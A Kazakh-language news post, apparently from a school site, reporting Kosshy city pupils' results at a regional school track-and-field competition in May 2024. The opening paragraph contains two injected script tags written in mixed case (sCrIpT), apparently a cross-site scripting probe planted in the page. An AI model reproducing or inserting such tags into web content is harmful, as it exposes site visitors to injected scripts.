2024 жылғы 14-17 мамыр күндері Есіл ауданының орталық стадионында “Жастар-2024” облыстық оқушылар XХVII спартакиадасының бағдарламасына сәйкес, 2006-2009 ж туылған оқушылар арасында «Жеңіл атлетика» спорт ойындарының облыстық кезеңі өткізілді.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

24.05.2024

2024 жылғы 14-17 мамыр күндері Есіл ауданының орталық стадионында “Жастар-2024” облыстық оқушылар XХVII спартакиадасының бағдарламасына сәйкес,  2006-2009 ж туылған  оқушылар арасында «Жеңіл атлетика» спорт ойындарының облыстық кезеңі өткізілді. Жарысқа 20 қала аудан команда ойыншылары оның ішінде  200-ге жуық оқушылар және жетекшілері қатысты.   Бірнеше спорт түрлерінен Қосшы қаласы атынан барған спортшыларымыз жақсы көрсеткішпен оралды.
Облыс бойынша «Жеңіл атлетика» оқушылары  спорттың 8 түрінен ойын көрсетіп,    100-200-400-800 м жүгіру, ұзындыққа секіру, ядро серпу, 1500-3000 м, эстафета 4+100 м (4 ұл+4 қыз) бойынша ойындар деңгейі көтеріліп келе жатыр.   
  Қосшы қаласы бойынша  мектептер арасынан құрылған 
құрама командаларының жарыс  нәтижесінің  көрсеткіші

-Жеңіл атлетикадан Ұзындыққа секіруден 5,20 м секірген №1ЖОББМ оқушысы Қалдыбек Ерқанат І орынды иемденді.
-Ядро серпуден (ұлдар) ІІІ орын иеленген Сабыр Нұржігіт №32 ЖОББМ оқушысы алды. 
-Ядро серпуден (қыздар) ІІІ орын иеленгені үшін Қуанышбаева Майра Тайтөбе а.ЖОББМ оқушысы марапатталды.

Эстафета бойынша көрсеткіш

-Сабыр Нұржігіт 4х100 №3ЖОББМ
-Амантай Айтуған 4х100 №1ЖОББМ
-Жақыпбек Дінмұхаммед 4х100 Тайтөбе а.ЖОББМ
-Қалдыбек Ерқанат 4х100 №1ЖОББМ

Есіл ауданындағы  жеңімпаздарымызды Кубоктармен жекелей грамоталармен медалдармен марапатталды. №1 ЖОББМ денешынықтыру мұғалімдеріне ризашылықтарымызды білдіремін!  
Команда қатысушыларын құттықтаймыз!!!

Просмотров: 2567


Пікір қосу



Деректерді қолтаңбаға қосу